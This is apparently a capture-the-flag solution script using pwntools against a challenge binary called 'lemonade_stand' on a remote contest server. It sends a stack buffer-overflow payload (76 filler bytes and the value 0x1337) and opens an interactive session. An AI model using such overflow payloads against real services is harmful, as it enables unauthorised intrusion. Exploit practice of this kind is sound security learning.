17 lines
373 B
Python
17 lines
373 B
Python
#!/usr/bin/env python3
|
|
from pwn import *
|
|
|
|
context.binary = elf = ELF("./lemonade_stand", checksec=False)
|
|
|
|
# p = process(elf.path)
|
|
p = remote("offsec.m0lecon.it", 13562)
|
|
# Your exploit here
|
|
# mov eax, DWORD_PTR[rbp-0x4] overwrite eax value
|
|
OFFSET = 76
|
|
leet = 0x1337
|
|
payload = flat(b"A" * OFFSET, p64(leet))
|
|
p.send(payload)
|
|
# p.send(b'cat flag\n')
|
|
# p.recv()
|
|
p.interactive()
|